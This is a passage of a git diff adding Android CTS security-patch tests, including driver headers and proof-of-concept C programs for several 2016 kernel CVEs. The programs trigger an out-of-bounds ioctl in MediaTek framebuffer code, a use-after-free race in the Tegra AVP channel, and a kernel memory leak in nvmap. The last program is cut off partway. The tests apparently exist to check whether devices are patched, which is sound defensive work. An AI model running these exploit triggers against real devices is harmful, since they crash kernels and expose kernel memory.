+ unsigned int isTdshp; /* set to 1, will go through tdshp first, then layer blending, then to color */
+
+ int next_buff_idx;
+ int identity;
+ int connected_type;
+ unsigned int security;
+ unsigned int alpha_enable;
+ unsigned int alpha;
+ int fence_fd; /* 8135 */
+ int ion_fd; /* 8135 CL 2340210 */
+};
+
+struct fb_overlay_config {
+ int fence;
+ int time;
+ struct fb_overlay_layer layers[4];
+};
+
+struct fb_overlay_buffer_info {
+ unsigned int src_vir_addr;
+ unsigned int size;
+};
+
+struct fb_overlay_layer_info {
+ unsigned int layer_id;
+ unsigned int layer_enabled; /* TO BE DEL */
+ unsigned int curr_en;
+ unsigned int next_en;
+ unsigned int hw_en;
+ int curr_idx;
+ int next_idx;
+ int hw_idx;
+ int curr_identity;
+ int next_identity;
+ int hw_identity;
+ int curr_conn_type;
+ int next_conn_type;
+ int hw_conn_type;
+ MTK_FB_ORIENTATION layer_rotation;
+};
+/* -------------------------------------------------------------------------- */
+
+struct fb_post_video_buffer {
+ void *phy_addr;
+ void *vir_addr;
+ MTK_FB_TV_SRC_FORMAT format;
+ unsigned int width, height;
+};
+
+#if defined(CONFIG_ARCH_MT6735) || defined(CONFIG_ARCH_MT6735M) || defined(CONFIG_ARCH_MT6753)
+extern unsigned int EnableVSyncLog;
+
+void mtkfb_log_enable(int enable);
+int mtkfb_set_backlight_mode(unsigned int mode);
+int mtkfb_set_backlight_level(unsigned int level);
+int mtkfb_get_debug_state(char *stringbuf, int buf_len);
+unsigned int mtkfb_fm_auto_test(void);
+void mtkfb_clear_lcm(void);
+#endif /* CONFIG_ARCH_MT6735 */
+
+#ifdef __KERNEL__
+
+#include <linux/completion.h>
+#include <linux/interrupt.h>
+#include <linux/workqueue.h>
+#include <linux/version.h>
+#include <../drivers/staging/android/sw_sync.h>
+
+
+#define MTKFB_DRIVER "mtkfb"
+
+enum mtkfb_state {
+ MTKFB_DISABLED = 0,
+ MTKFB_SUSPENDED = 99,
+ MTKFB_ACTIVE = 100
+};
+
+typedef enum {
+ MTKFB_LAYER_ENABLE_DIRTY = (1 << 0),
+ MTKFB_LAYER_FORMAT_DIRTY = (1 << 1),
+ MTKFB_LAYER_SET_DIRTY = (1 << 2),
+} MTKFB_LAYER_CONFIG_DIRTY;
+
+typedef struct {
+ struct work_struct work;
+ struct list_head list;
+ struct fb_overlay_config config;
+ struct sync_fence *fences[4];
+ struct ion_handle *ion_handles[4];
+ void *dev;
+} update_ovls_work_t;
+
+struct mtkfb_device {
+ int state;
+ void *fb_va_base; /* MPU virtual address */
+ dma_addr_t fb_pa_base; /* Bus physical address */
+ unsigned long fb_size_in_byte;
+ void *ovl_va_base; /* MPU virtual address */
+ dma_addr_t ovl_pa_base; /* Bus physical address */
+ unsigned long ovl_size_in_byte;
+
+ unsigned long layer_enable;
+ MTK_FB_FORMAT *layer_format;
+ unsigned int layer_config_dirty;
+
+ int xscale, yscale, mirror; /* transformations.
+ rotate is stored in fb_info->var */
+ u32 pseudo_palette[17];
+
+ struct fb_info *fb_info; /* Linux fbdev framework data */
+ struct device *dev;
+
+ /* Android native fence support */
+ struct workqueue_struct *update_ovls_wq;
+ struct mutex timeline_lock;
+ struct sw_sync_timeline *timeline;
+ int timeline_max;
+ struct list_head pending_configs; /* CL2340210 */
+ struct ion_client *ion_client;
+};
+
+#endif /* __KERNEL__ */
+
+extern long hdmi_handle_cmd(unsigned int cmd, unsigned long arg);
+
+#if defined(CONFIG_ARCH_MT6797)
+extern unsigned int vramsize;
+#endif
+
+#if defined(CONFIG_ARCH_MT6735) || defined(CONFIG_ARCH_MT6735M) || defined(CONFIG_ARCH_MT6753)
+extern bool is_early_suspended;
+extern void mtkfb_waitVsync(void);
+extern bool is_ipoh_bootup;
+
+#ifdef CONFIG_OF
+int _parse_tag_videolfb(void);
+extern unsigned int islcmconnected;
+extern unsigned int vramsize;
+#else
+extern char *saved_command_line;
+#endif
+#endif /* CONFIG_ARCH_MT6735 */
+
+
+#endif /* __MTKFB_H */
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb_info.h b/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb_info.h
new file mode 100644
index 0000000..61e7cfd
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb_info.h
@@ -0,0 +1,101 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __MTKFB_INFO_H__
+#define __MTKFB_INFO_H__
+
+#ifdef __cplusplus
+extern "C" {
+#endif
+
+
+ typedef enum {
+ DISPIF_TYPE_DBI = 0,
+ DISPIF_TYPE_DPI,
+ DISPIF_TYPE_DSI,
+ DISPIF_TYPE_DPI0,
+ DISPIF_TYPE_DPI1,
+ DISPIF_TYPE_DSI0,
+ DISPIF_TYPE_DSI1,
+ HDMI = 7,
+ HDMI_SMARTBOOK,
+ MHL,
+ DISPIF_TYPE_EPD,
+ SLIMPORT
+ } MTKFB_DISPIF_TYPE;
+
+ typedef enum {
+ MTKFB_DISPIF_PRIMARY_LCD = 0,
+ MTKFB_DISPIF_HDMI,
+ MTKFB_DISPIF_EPD,
+ MTKFB_MAX_DISPLAY_COUNT
+ } MTKFB_DISPIF_DEVICE_TYPE;
+
+ typedef enum {
+ DISPIF_FORMAT_RGB565 = 0,
+ DISPIF_FORMAT_RGB666,
+ DISPIF_FORMAT_RGB888
+ } MTKFB_DISPIF_FORMAT;
+
+
+ typedef enum {
+ DISPIF_MODE_VIDEO = 0,
+ DISPIF_MODE_COMMAND
+ } MTKFB_DISPIF_MODE;
+
+ typedef struct mtk_dispif_info {
+ unsigned int display_id;
+ unsigned int isHwVsyncAvailable;
+ MTKFB_DISPIF_TYPE displayType;
+ unsigned int displayWidth;
+ unsigned int displayHeight;
+ unsigned int displayFormat;
+ MTKFB_DISPIF_MODE displayMode;
+ unsigned int vsyncFPS;
+ unsigned int physicalWidth;
+ unsigned int physicalHeight;
+ unsigned int isConnected;
+/* this value is for DFO Multi-Resolution feature, which stores the original LCM Wdith */
+ unsigned int lcmOriginalWidth;
+/* this value is for DFO Multi-Resolution feature, which stores the original LCM Height */
+ unsigned int lcmOriginalHeight;
+ } mtk_dispif_info_t;
+
+#define MAKE_MTK_FB_FORMAT_ID(id, bpp) (((id) << 8) | (bpp))
+
+ typedef enum {
+ MTK_FB_FORMAT_UNKNOWN = 0,
+
+ MTK_FB_FORMAT_RGB565 = MAKE_MTK_FB_FORMAT_ID(1, 2),
+ MTK_FB_FORMAT_RGB888 = MAKE_MTK_FB_FORMAT_ID(2, 3),
+ MTK_FB_FORMAT_BGR888 = MAKE_MTK_FB_FORMAT_ID(3, 3),
+ MTK_FB_FORMAT_ARGB8888 = MAKE_MTK_FB_FORMAT_ID(4, 4),
+ MTK_FB_FORMAT_ABGR8888 = MAKE_MTK_FB_FORMAT_ID(5, 4),
+ MTK_FB_FORMAT_YUV422 = MAKE_MTK_FB_FORMAT_ID(6, 2),
+ MTK_FB_FORMAT_XRGB8888 = MAKE_MTK_FB_FORMAT_ID(7, 4),
+ MTK_FB_FORMAT_XBGR8888 = MAKE_MTK_FB_FORMAT_ID(8, 4),
+ MTK_FB_FORMAT_UYVY = MAKE_MTK_FB_FORMAT_ID(9, 2),
+ MTK_FB_FORMAT_YUV420_P = MAKE_MTK_FB_FORMAT_ID(10, 2),
+ MTK_FB_FORMAT_YUY2 = MAKE_MTK_FB_FORMAT_ID(11, 2),
+ MTK_FB_FORMAT_BPP_MASK = 0xFF,
+ } MTK_FB_FORMAT;
+
+#define GET_MTK_FB_FORMAT_BPP(f) ((f) & MTK_FB_FORMAT_BPP_MASK)
+
+
+#ifdef __cplusplus
+}
+#endif
+#endif /* __DISP_DRV_H__ */
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8448/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8448/poc.c
new file mode 100644
index 0000000..e5f675b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8448/poc.c
@@ -0,0 +1,59 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include <sys/mman.h>
+#include <fcntl.h>
+//#include <pthread.h>
+#include <sys/prctl.h>
+#include <unistd.h>
+#include <stdbool.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <asm-generic/ioctl.h>
+#include "mtkfb.h"
+int main(int argc, char **argv) {
+ int fd = 0;
+ struct fb_overlay_layer layerInfo;
+ memset(&layerInfo, 0, sizeof(layerInfo));
+ fd = open("/dev/graphics/fb0", O_RDWR);
+ if (fd < 0) {
+ perror("open /dev/graphics/fb0");
+ exit(-1);
+ }
+ printf("Device file opened successfully\n");
+ printf("Trying to get layer info\n");
+ if(ioctl(fd, MTKFB_GET_OVERLAY_LAYER_INFO, &layerInfo) == -1) {
+ perror("ioctl MTKFB_GET_OVERLAY_LAYER_INFO failed");
+ exit(-2);
+ }
+ printf("Got layer info\n");
+ printf("Trying to set layer info\n");
+ // set any huge value here
+ int curr_val = 0xf1111111;
+ while(1) {
+ layerInfo.layer_id = curr_val;
+ if(ioctl(fd, MTKFB_SET_OVERLAY_LAYER, &layerInfo) == -1) {
+ perror("ioctl MTKFB_SET_OVERLAY_LAYER failed");
+ //exit(-2);
+ }
+ curr_val--;
+ if(curr_val == -1) {
+ break;
+ }
+ }
+ printf("Set layer info\n");
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8449/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8449/Android.mk
new file mode 100644
index 0000000..ce1e1bb
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8449/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8449
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8449/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8449/poc.c
new file mode 100755
index 0000000..1e76b55
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8449/poc.c
@@ -0,0 +1,143 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <string.h>
+#include <errno.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) printf(fmt ": %d(%s)\n", ##__VA_ARGS__, errno, strerror(errno))
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+#define CLOSE_THREAD_NUM 100
+#define TRY_TIMES 900
+
+#define DEV "/dev/tegra_avpchannel"
+
+#define NVAVP_IOCTL_MAGIC 'n'
+
+struct nvavp_channel_open_args {
+ __u32 channel_fd;
+};
+
+#define NVAVP_IOCTL_CHANNEL_OPEN _IOR(NVAVP_IOCTL_MAGIC, 0x73, \
+ struct nvavp_channel_open_args)
+
+int fd;
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ ERR("[-] set affinity failed");
+ }
+ return ret;
+}
+
+volatile int target_fd;
+volatile int attack;
+void* close_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(attack){
+ close(target_fd);
+ }
+
+ return NULL;
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+ struct nvavp_channel_open_args o_args = { 0 };
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV, O_RDONLY);
+ if(fd == -1){
+ ERR("[-] open failed");
+ return 0;
+ } else {
+ LOG("[+] open OK");
+ }
+
+ #if 1
+ ret = ioctl(fd, NVAVP_IOCTL_CHANNEL_OPEN, &o_args);
+ if(ret == -1) {
+ ERR("[-] ioctl failed");
+ goto out_dev;
+ } else {
+ LOG("[+] ioctl OK, fd = %d", o_args.channel_fd);
+ }
+
+ target_fd = o_args.channel_fd;
+ #endif
+
+ /* create close thread */
+ #if 1
+ attack = 1;
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ ret = pthread_create(close_thread_id + i, NULL, close_thread, NULL);
+ if(ret){
+ ERR("[-] create close thread %d failed", i);
+ goto out_close_thread;
+ }
+ }
+ #endif
+
+ #if 1
+ for(i = 0; i < TRY_TIMES; i++){
+ LOG("[+] %03d times", i);
+ /* open */
+ ret = ioctl(fd, NVAVP_IOCTL_CHANNEL_OPEN, &o_args);
+ if(ret == -1) {
+ ERR("[-] ioctl failed");
+ } else {
+ LOG("[+] ioctl OK, fd = %d", o_args.channel_fd);
+ }
+ //usleep(200);
+ }
+ #endif
+
+out_close_thread:
+ attack = 0;
+ /* kill close thread */
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ if(close_thread_id[i])
+ pthread_join(close_thread_id[i], NULL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8460/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8460/Android.mk
new file mode 100644
index 0000000..b9c51d1
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8460/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8460
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS := -Wall -W -g -O2 -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8460/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8460/poc.c
new file mode 100755
index 0000000..78d41e5
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8460/poc.c
@@ -0,0 +1,165 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <errno.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+
+struct nvmap_handle_param {
+ __u32 handle; /* nvmap handle */
+ __u32 param; /* size/align/base/heap etc. */
+ unsigned long result; /* returns requested info*/
+};
+
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+
+struct nvmap_pin_handle {
+ __u32 *handles; /* array of handles to pin/unpin */
+ unsigned long *addr; /* array of addresses to return */
+ __u32 count; /* number of entries in handles */
+};
+
+struct nvmap_alloc_handle {
+ __u32 handle; /* nvmap handle */
+ __u32 heap_mask; /* heaps to allocate from */
+ __u32 flags; /* wb/wc/uc/iwb etc. */
+ __u32 align; /* min alignment necessary */
+};
+
+struct nvmap_pin_handle_32 {
+ __u32 handles; /* array of handles to pin/unpin */
+ __u32 addr; /* array of addresses to return */
+ __u32 count; /* number of entries in handles */
+};
+
+struct nvmap_map_caller_32 {
+ __u32 handle; /* nvmap handle */
+ __u32 offset; /* offset into hmem; should be page-aligned */
+ __u32 length; /* number of bytes to map */
+ __u32 flags; /* maps as wb/iwb etc. */
+ __u32 addr; /* user pointer*/
+};
+
+#define NVMAP_IOC_MAGIC 'N'
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_PIN_MULT _IOWR(NVMAP_IOC_MAGIC, 10, struct nvmap_pin_handle)
+#define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+#define NVMAP_IOC_PIN_MULT_32 _IOWR(NVMAP_IOC_MAGIC, 10, struct nvmap_pin_handle_32)
+#define NVMAP_IOC_MMAP_32 _IOWR(NVMAP_IOC_MAGIC, 5, struct nvmap_map_caller_32)
+
+/* common carveout heaps */
+#define NVMAP_HEAP_CARVEOUT_IRAM (1ul<<29)
+#define NVMAP_HEAP_CARVEOUT_VPR (1ul<<28)
+#define NVMAP_HEAP_CARVEOUT_TSEC (1ul<<27)
+#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
+
+#define NVMAP_HEAP_CARVEOUT_MASK (NVMAP_HEAP_IOVMM - 1)
+
+/* allocation flags */
+#define NVMAP_HANDLE_UNCACHEABLE (0x0ul << 0)
+#define NVMAP_HANDLE_WRITE_COMBINE (0x1ul << 0)
+#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
+#define NVMAP_HANDLE_CACHEABLE (0x3ul << 0)
+#define NVMAP_HANDLE_CACHE_FLAG (0x3ul << 0)
+
+#define NVMAP_HANDLE_SECURE (0x1ul << 2)
+#define NVMAP_HANDLE_KIND_SPECIFIED (0x1ul << 3)
+#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
+#define NVMAP_HANDLE_ZEROED_PAGES (0x1ul << 5)
+#define NVMAP_HANDLE_PHYS_CONTIG (0x1ul << 6)
+#define NVMAP_HANDLE_CACHE_SYNC (0x1ul << 7)
+
+
+int g_fd = -1;
+
+int open_driver() {
+ char* dev_path = "/dev/nvmap";
+ g_fd = open(dev_path, O_RDWR);
+ return g_fd;
+}
+
+
+int main(int argc, char**argv) {
+ if (open_driver() < 0) {
+ return -1;
+ }
+
+ int i;
+ int* handles = mmap((void*)0x20000000, 0x1000, PROT_READ | PROT_WRITE , MAP_FIXED | MAP_SHARED | MAP_ANONYMOUS, -1, 0);
+ memset(handles, 0x42, 0x1000);
+ for (i = 0; i < 2; ++i) {
+ struct nvmap_create_handle op = {0};
+ op.size = 0x1000;
+ ioctl(g_fd, NVMAP_IOC_CREATE, &op);
+ handles[i] = op.handle;
+ struct nvmap_alloc_handle alloc = {0};
+ alloc.align = 0x1000;
+ alloc.handle = op.handle;
+ alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
+ alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
+ ioctl(g_fd, NVMAP_IOC_ALLOC, &alloc);
+ }
+
+ void* leak_addr = (void*) 0x10001000;
+ void* mmap_addr = mmap(leak_addr, 0x1000, PROT_READ | PROT_WRITE , MAP_FIXED | MAP_SHARED | MAP_ANONYMOUS, -1, 0);
+ memset(leak_addr, 0x41, 0x1000);
+
+ unsigned long leaked_data = 0;
+ struct nvmap_pin_handle_32 pin = {0};
+ pin.count = 2;
+ pin.handles = (unsigned int) handles;
+ struct nvmap_pin_handle err_pin = {0};
+ err_pin.count = 0;
+ err_pin.handles = handles;
+ err_pin.addr = leak_addr + 8;
+
+ ioctl(g_fd, NVMAP_IOC_PIN_MULT, &err_pin); // construct op.addr
+ ioctl(g_fd, NVMAP_IOC_PIN_MULT_32, &pin);
+
+ for (i = 0; i < 10; ++i) {
+ if(((int*)leak_addr)[i] != 0x41414141 && 0 == leaked_data) {
+ leaked_data = (unsigned long)((int*)leak_addr) + i;
+ }
+ }
+
+ if (leaked_data) {
+ printf("Vulnerable");
+ }
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8482/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8482/Android.mk
new file mode 100644
index 0000000..b41fb16
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8482/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8482
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8482/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8482/poc.c
new file mode 100644
index 0000000..41862a5
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8482/poc.c
@@ -0,0 +1,205 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+// for syscall
+#include <sys/syscall.h>
+// for futex
+#include <linux/futex.h>
+#include <sys/time.h>
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) printf(fmt ": %d(%d)\n", ##__VA_ARGS__, errno, errno)
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+
+#define NVMAP_IOC_MAGIC 'N'
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+
+#define NVHOST_IOCTL_MAGIC 'H'
+struct nvhost_set_error_notifier {
+ __u64 offset;
+ __u64 size;
+ __u32 mem;
+ __u32 padding;
+};
+#define NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER \
+ _IOWR(NVHOST_IOCTL_MAGIC, 111, struct nvhost_set_error_notifier)
+
+struct nvmap_alloc_handle {
+ __u32 handle; /* nvmap handle */
+ __u32 heap_mask; /* heaps to allocate from */
+ __u32 flags; /* wb/wc/uc/iwb etc. */
+ __u32 align; /* min alignment necessary */
+};
+#define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ printf("[-] set affinity failed: [%d]-%d\n", errno, errno);
+ }
+ return ret;
+}
+
+struct nvhost_submit_args {
+ __u32 submit_version;
+ __u32 num_syncpt_incrs;
+ __u32 num_cmdbufs;
+ __u32 num_relocs;
+ __u32 num_waitchks;
+ __u32 timeout;
+ __u32 flags;
+ __u32 fence; /* Return value */
+ __u64 syncpt_incrs;
+ __u64 cmdbuf_exts;
+
+ __u64 pad[3]; /* future expansion */
+
+ __u64 cmdbufs;
+ __u64 relocs;
+ __u64 reloc_shifts;
+ __u64 waitchks;
+ __u64 waitbases;
+ __u64 class_ids;
+ __u64 fences;
+};
+#define NVHOST_IOCTL_CHANNEL_SUBMIT \
+ _IOWR(NVHOST_IOCTL_MAGIC, 26, struct nvhost_submit_args)
+
+struct nvhost_syncpt_incr {
+ __u32 syncpt_id;
+ __u32 syncpt_incrs;
+};
+
+#define CLOSE_THREAD_NUM 1
+#define TRY_TIMES 2
+#define NVMAPDEV "/dev/nvmap"
+#define VICDEV "/dev/nvhost-vic"
+#define SYNC_NUM 1
+struct nvhost_set_error_notifier err1 = { 0 }, err2 = { 0 };
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+int nvmap, vic;
+volatile int attack;
+void* close_thread(void* no_use)
+{
+ int ret;
+ set_affinity(1);
+
+ while(attack){
